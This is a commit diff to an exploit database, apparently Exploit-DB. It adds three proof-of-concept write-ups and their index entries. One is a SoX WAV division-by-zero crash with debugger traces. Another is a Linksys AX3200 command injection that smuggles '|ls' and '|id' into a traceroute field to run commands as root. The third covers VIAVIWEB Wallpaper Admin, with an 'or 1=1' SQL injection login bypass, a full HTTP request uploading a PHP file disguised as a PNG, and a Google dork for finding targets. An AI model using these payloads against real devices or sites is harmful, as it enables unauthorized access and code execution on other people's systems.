DB: 2023-03-23

4 changes to exploits/shellcodes/ghdb SoX 14.4.2 - Denial Of Service Linksys AX3200 V1.1.00 - Command Injection VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities
2023-03-23 00:16:30 +00:00 · 2023-03-23 00:16:30 +00:00 · 6206f4f208
commit 6206f4f208
parent 7d85ccf96b
4 changed files with 165 additions and 0 deletions
--- a/exploits/hardware/dos/51034.txt
+++ b/exploits/hardware/dos/51034.txt
@ -0,0 +1,77 @@
+# Exploit Title: SoX 14.4.2 - Denial Of Service
+# Exploit Author: LiquidWorm
+
+
+Vendor: Chris Bagwell
+Product web page: http://sox.sourceforge.net
+                  https://en.wikipedia.org/wiki/SoX
+Affected version: <=14.4.2
+
+Summary: SoX (Sound eXchange) is the Swiss Army knife of sound processing
+tools: it can convert sound files between many different file formats and
+audio devices, and can apply many sound effects and transformations, as well
+as doing basic analysis and providing input to more capable analysis and
+plotting tools.
+
+Desc: SoX suffers from a division by zero attack when handling WAV files,
+resulting in denial of service vulnerability and possibly loss of data.
+
+Tested on: Ubuntu 18.04.6 LTS
+           Microsoft Windows 10 Home
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2022-5712
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5712.php
+
+CWE ID: 369
+CWE URL: https://cwe.mitre.org/data/definitions/369.html
+
+
+05.09.2022
+
+--
+
+
+PoC:
+
+https://zeroscience.mk/codes/sox_div0.wav.zip
+
+---
+
+$ ./sox div0.wav test.wav reverse
+Floating point exception (core dumped)
+...
+Program received signal SIGFPE, Arithmetic exception.
+0x00005555556a560d in startread (ft=ft@entry=0x5555559a54a0) at wav.c:950
+(gdb) bt
+#0  0x00005555556a560d in startread (ft=ft@entry=0x5555559a54a0) at wav.c:950
+#1  0x000055555558dcc2 in open_read (path=<optimized out>, buffer=<optimized out>, buffer_size=<optimized out>, signal=0x5555559a5140, encoding=<optimized out>, filetype=0x555555777621 "wav")
+    at formats.c:545
+#2  0x0000555555561480 in main (argc=3, argv=0x7fffffffde18) at sox.c:2945
+...
+Program received signal SIGFPE, Arithmetic exception.
+0x00005555556a3a32 in wavwritehdr (second_header=0, ft=0x5555559a6a90) at wav.c:1457
+1457	        blocksWritten = MS_UNSPEC/wBlockAlign;
+(gdb) bt
+#0  0x00005555556a3a32 in wavwritehdr (second_header=0, ft=0x5555559a6a90) at wav.c:1457
+#1  startwrite (ft=0x5555559a6a90) at wav.c:1252
+#2  0x0000555555591669 in open_write (path=<optimized out>, buffer=buffer@entry=0x0, buffer_size=buffer_size@entry=0, buffer_ptr=buffer_ptr@entry=0x0, buffer_size_ptr=buffer_size_ptr@entry=0x0,
+    signal=<optimized out>, encoding=<optimized out>, filetype=<optimized out>, oob=<optimized out>, overwrite_permitted=<optimized out>) at formats.c:912
+#3  0x0000555555593913 in sox_open_write (path=<optimized out>, signal=<optimized out>, encoding=<optimized out>, filetype=<optimized out>, oob=<optimized out>, overwrite_permitted=<optimized out>)
+    at formats.c:948
+#4  0x000055555556b620 in open_output_file () at sox.c:1557
+#5  process () at sox.c:1754
+#6  main (argc=<optimized out>, argv=<optimized out>) at sox.c:3008
+(gdb) bt full
+#0  0x00005555556a3a32 in wavwritehdr (second_header=0, ft=0x5555559a6a90) at wav.c:1457
+        wFormatTag = 1
+        dwAvgBytesPerSec = 0
+        dwFactSize = 4
+        bytespersample = <optimized out>
+        blocksWritten = <error reading variable blocksWritten (Division by zero)>
+        dwSamplesWritten = 0
+...
--- a/exploits/hardware/webapps/51035.txt
+++ b/exploits/hardware/webapps/51035.txt
@ -0,0 +1,16 @@
+# Exploit Title: Linksys AX3200 V1.1.00 - Command Injection
+# Date: 2022-09-19
+# Exploit Author: Ahmed Alroky
+# Author: Linksys
+# Version: 1.1.00
+# Authentication Required: YES
+# CVE : CVE-2022-38841
+
+# Tested on: Windows
+
+# Proof Of Concept:
+
+1 - login into AX3200 webui
+2 - go to diagnostics page
+3 - put "google.com|ls" to perform a traceroute
+4 - you will get the file list and also you can try "example.com|id" to ensure that all commands executed as a root user
--- a/exploits/php/webapps/51033.txt
+++ b/exploits/php/webapps/51033.txt
@ -0,0 +1,69 @@
+# Exploit Title: VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities
+# Google Dork: intext:"Wallpaper Admin"   "LOGIN" "password" "Username"
+# Date: [18/09/2022]
+# Exploit Author: [Edd13Mora]
+# Vendor Homepage: [www.viaviweb.com]
+# Version: [N/A]
+# Tested on: [Windows 11 - Kali Linux]
+
+------------------
+SQLI on the Login page
+------------------
+payload --> admin' or 1=1-- -
+---
+POC:
+---
+[1] Disable JavaScript on ur browser put the payload and submit
+[2] Reactive JavaScript and resend the request
+---------------------------
+Authenticated SQL Injection:
+---------------------------
+Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/edit_gallery_image.php?img_id=[number]
+-----------------------------------------------
+Remote Code Execution (RCE none authenticated):
+-----------------------------------------------
+Poc:
+----
+Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/add_gallery_image.php?add=yes
+--------------------
+Burp Request :
+--------------------
+
+POST /hd_wallpaper/add_gallery_image.php?add=yes HTTP/2
+Host: http://googlezik.freehostia.com
+Cookie: _octo=GH1.1.993736861.1663458698; PHPSESSID=qh3c29sbjr009jdg8oraed4o52
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------33893919268150571572221367848
+Content-Length: 467
+Origin: http://googlezik.freehostia.com
+Referer: http://googlezik.freehostia.com/hd_wallpaper/add_gallery_image.php?add=yes
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+Te: trailers
+
+-----------------------------33893919268150571572221367848
+Content-Disposition: form-data; name="category_id"
+
+1
+-----------------------------33893919268150571572221367848
+Content-Disposition: form-data; name="image[]"; filename="poc.php"
+Content-Type: image/png
+
+<?php phpinfo(); ?>
+-----------------------------33893919268150571572221367848
+Content-Disposition: form-data; name="submit"
+
+
+-----------------------------33893919268150571572221367848--
+
+
+Uploaded File can be found here :
+--------------------------------
+http://localhost/PAth-Where-Script-Installed/categories/
+```
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -3165,6 +3165,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 25711,exploits/hardware/dos/25711.txt,"Sony Ericsson P900 Beamer - Malformed File Name Handling Denial of Service",2005-05-26,"Marek Bialoglowy",dos,hardware,,2005-05-26,2013-05-26,1,,,,,,https://www.securityfocus.com/bid/13782/info
 44197,exploits/hardware/dos/44197.md,"Sony Playstation 4 (PS4) 5.01 < 5.05 - WebKit Code Execution (PoC)",2018-02-27,ALEXZZZ9,dos,hardware,,2018-02-28,2018-04-25,0,,Console,,http://www.exploit-db.com/screenshots/idlt44500/screenshot.png,,https://github.com/ALEXZZZ9/PS4-5.01-WebKit-Exploit-PoC/tree/bf295a89c4f78164275c024710540662e0bce83b
 1473,exploits/hardware/dos/1473.c,"Sony/Ericsson Bluetooth - Reset Display Denial of Service",2006-02-06,"Pierre Betouin",dos,hardware,,2006-02-05,,1,OSVDB-23055;CVE-2006-0671,,,,,
+51034,exploits/hardware/dos/51034.txt,"SoX 14.4.2 - Denial Of Service",2023-03-22,LiquidWorm,dos,hardware,,2023-03-22,2023-03-22,0,,,,,,
 46261,exploits/hardware/dos/46261.sh,"Sricam gSOAP 2.8 - Denial of Service",2019-01-28,"Andrew Watson",dos,hardware,5000,2019-01-28,2019-01-28,0,CVE-2019-6973,"Denial of Service (DoS)",,,,
 28228,exploits/hardware/dos/28228.txt,"Sunbelt Kerio Personal Firewall 4.3.426 - CreateRemoteThread Denial of Service",2006-07-15,"David Matousek",dos,hardware,,2006-07-15,2013-09-17,1,CVE-2006-3787;OSVDB-27337,,,,,https://www.securityfocus.com/bid/18996/info
 40687,exploits/hardware/dos/40687.txt,"SunellSecurity NVR / Camera - Denial of Service",2016-11-02,qwsj,dos,hardware,,2016-11-02,2016-11-09,0,,,,,,
@ -4431,6 +4432,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34163,exploits/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,webapps,hardware,,2014-07-24,2014-07-24,0,OSVDB-109522;OSVDB-109521;OSVDB-109520;OSVDB-109519;OSVDB-109518,,,,,
 40690,exploits/hardware/webapps/40690.txt,"LifeSize Room 5.0.9 - Multiple Vulnerabilities",2016-11-02,"Xiphos Research Ltd",webapps,hardware,,2016-11-02,2016-11-02,0,,,,,,https://github.com/XiphosResearch/exploits/tree/master/deathsize
 47649,exploits/hardware/webapps/47649.py,"Linear eMerge E3 1.00-06 - Remote Code Execution",2019-11-13,LiquidWorm,webapps,hardware,,2019-11-13,2019-11-13,0,,,,,,
+51035,exploits/hardware/webapps/51035.txt,"Linksys AX3200 V1.1.00 - Command Injection",2023-03-22,"Ahmed Alroky",webapps,hardware,,2023-03-22,2023-03-22,0,CVE-2022-38841,,,,,
 24475,exploits/hardware/webapps/24475.txt,"Linksys E1500/E2500 - Multiple Vulnerabilities",2013-02-11,m-1-k-3,webapps,hardware,,2013-02-11,2013-02-11,1,OSVDB-89916;OSVDB-89915;OSVDB-89914;OSVDB-89913;OSVDB-89912;OSVDB-89911;CVE-2013-2678,,,http://www.exploit-db.com/screenshots/idlt24500/screen-shot-2013-02-11-at-110220-am.png,,http://www.s3cur1ty.de/m1adv2013-004
 49708,exploits/hardware/webapps/49708.txt,"Linksys EA7500 2.0.8.194281 - Cross-Site Scripting",2021-03-25,MiningOmerta,webapps,hardware,,2021-03-25,2021-03-25,0,CVE-2012-6708,,,,,
 49270,exploits/hardware/webapps/49270.py,"Linksys RE6500 1.0.11.001 - Unauthenticated RCE",2020-12-17,RE-Solver,webapps,hardware,,2020-12-17,2020-12-17,0,,,,,,
@ -31181,6 +31183,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41316,exploits/php/webapps/41316.txt,"Viavi Movie Review - 'id' SQL Injection",2017-02-12,"Ihsan Sencan",webapps,php,,2017-02-12,2017-02-12,0,,,,,,
 41317,exploits/php/webapps/41317.txt,"Viavi Product Review - 'id' SQL Injection",2017-02-12,"Ihsan Sencan",webapps,php,,2017-02-12,2017-02-12,0,,,,,,
 41315,exploits/php/webapps/41315.txt,"Viavi Real Estate - SQL Injection",2017-02-12,"Ihsan Sencan",webapps,php,,2017-02-12,2017-02-12,0,,,,,,
+51033,exploits/php/webapps/51033.txt,"VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities",2023-03-22,Edd13Mora,webapps,php,,2023-03-22,2023-03-22,0,,,,,,
 6978,exploits/php/webapps/6978.txt,"Vibro-CMS - Multiple SQL Injections",2008-11-04,StAkeR,webapps,php,,2008-11-03,,1,OSVDB-54277;CVE-2008-6795,,,,,
 6981,exploits/php/webapps/6981.txt,"Vibro-School-CMS - 'nID' SQL Injection",2008-11-04,Cyber-Zone,webapps,php,,2008-11-03,2016-12-30,1,OSVDB-54277;CVE-2008-6795,,,,,
 36081,exploits/php/webapps/36081.txt,"VicBlog - 'tag' SQL Injection",2011-08-24,"Eyup CELIK",webapps,php,,2011-08-24,2015-02-15,1,,,,,,https://www.securityfocus.com/bid/49304/info